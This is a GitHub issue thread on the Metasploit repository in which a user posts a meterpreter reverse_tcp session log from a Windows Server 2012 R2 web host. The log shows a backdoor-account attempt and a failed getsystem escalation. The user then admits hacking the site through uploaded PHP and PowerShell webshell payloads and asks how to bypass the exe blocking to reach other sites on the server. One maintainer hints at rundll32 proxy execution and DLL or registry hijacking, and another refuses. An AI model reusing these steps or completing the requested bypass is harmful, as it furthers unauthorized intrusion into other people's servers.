Metasploit-framework: priv_elevate_getsystem: Operation failed

Created on 19 Oct 2019 · 4Comments · Source: rapid7/metasploit-framework

The PAYLOAD
windows/meterpreter/reverse_tcp
using fatrat powershell.bat

My OS :-
windows 7 64bit
the same problem on kali 2.0 amd64 - debian

Metasploit version :-
latest version
Victim OS :
Windows NT DTIN 6.3 build 9200 (Windows Server 2012 R2 Standard Edition) i586

meterpreter > sysinfo
Computer : DTIN
OS : Windows 2012 R2 (6.3 Build 9600).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 100

Meterpreter : x86/windows

   =[ metasploit v4.17.84-dev                         ]

-- --=[ 1933 exploits - 1165 auxiliary - 346 post ]
-- --=[ 545 payloads - 45 encoders - 10 nops ]
-- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

[*] Successfully loaded plugin: pro
msf > use exploit/multi/handler
msf exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf exploit(multi/handler) > set LHOST xxx.xxx.xxx.xx
LHOST => xx.xxx.xxx.xx
msf exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > exploit

[-] Handler failed to bind to xx.xx.xxx.xx:4444:- -
[] Started reverse TCP handler on 0.0.0.0:4444
[] Sending stage (180291 bytes) to x..xx..xx.xx
[] Meterpreter session 1 opened (x.xxx.xxx.xxx:4444 -> xxxx.xxx.xx:51984) at
2019-10-19 17:34:28 +0200
[] Sending stage (180291 bytes) to x..xx.x.xx
[*] Meterpreter session 2 opened (x..x.xx.xxx.xx.x:4444 -> x..xx.xx.xx.:52950) at
2019-10-19 17:34:33 +0200

meterpreter >

meterpreter > shell
Process 13692 created.
Channel 1 created.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Inetpub\vhosts\xxxxx>start exx.exe
start exx.exe
This program is blocked by group policy. For more information, contact your system administrator.
so i can't start or execute any files .exe
that's why i used .bat

C:\Inetpub\vhosts\xxxxxxx>net user theblackattacker password /add
net user theblackattacker password /add
System error 5 has occurred.

Access is denied.
meterpreter > execute -f exx.exe
[-] stdapi_sys_process_execute: Operation failed: 1260
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: The environment is incorrect. The
following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
meterpreter > getuid
Server username: DTIN\IWPD_137(user)
meterpreter >

question

Source

theblackattacker

Most helpful comment

Prefacing this with the assumption you own this machine of have permission to access it.....

This all looks correct? You are using a user level account on a locked-down server. getsystem only modifies access; it does not bypass it. Most of the privilege escalations will try to execute a binary. In this case, it looks like some set of binaries are not approved for execution.
Without knowing how locked down the system is, or what the exx.exe does, my suggestion would be to explore using a signed binary to get execution of an unsigned binary (like rundll32.exe) or check for a hijacking opportunity in the registry or dll imports. That would also work if you could gain a privilege escalation by any of those methods, too.

bwatters-r7 on 21 Oct 2019

👍2 ❤1

All 4 comments

Prefacing this with the assumption you own this machine of have permission to access it.....

bwatters-r7 on 21 Oct 2019

👍2 ❤1

Prefacing this with the assumption you own this machine of have permission to access it.....

This all looks correct? You are using a user level account on a locked-down server. getsystem only modifies access; it does not bypass it. Most of the privilege escalations will try to execute a binary. In this case, it looks like some set of binaries are not approved for execution.
Without knowing how locked down the system is, or what the exx.exe does, my suggestion would be to explore using a signed binary to get execution of an unsigned binary (like rundll32.exe) or check for a hijacking opportunity in the registry or dll imports. That would also work if you could gain a privilege escalation by any of those methods, too.

u totaly right , i hacked a website using sever windows 2012 R2 6.3
then i did upload php payload only was working for 3 minutes ,
idid make php script to execute my powershell payload
caz using start powershell.bat dosne't work using webshell.php or webshell.aspx
so , i did connect and get meterpreter .. when i'm trying to upload my shell on another site in the same server , i found i can't go to anywhere ! only the same site i did hack ,, i tried to bypass it with another shells , nothing working , exe files was working but now admin did block them ..
all what i need is bypass the site i use and hack other sites in the same sever !
that's y i tried to use getsystem
can u explain more about
"hijacking opportunity in the registry or dll imports"
and
"y suggestion would be to explore using a signed binary to get execution of an unsigned binary (like rundll32.exe)"
how i can do that ?? and do u have tutorial ? and don't forget exe file won't work
another thing
can i inject payload to proccess using armitage or metasploit ? what do u think??

theblackattacker on 23 Oct 2019

Sorry, Github isn't the right location to ask for help on "how to hack".

OJ on 23 Oct 2019

Sorry, Github isn't the right location to ask for help on "how to hack".

i just didn't understand what he means .. ok i understand
but the same problem , how i can i bypass exe files blocking using command shell or meterpreter ?

theblackattacker on 23 Oct 2019

Was this page helpful?

0 / 5 - 0 ratings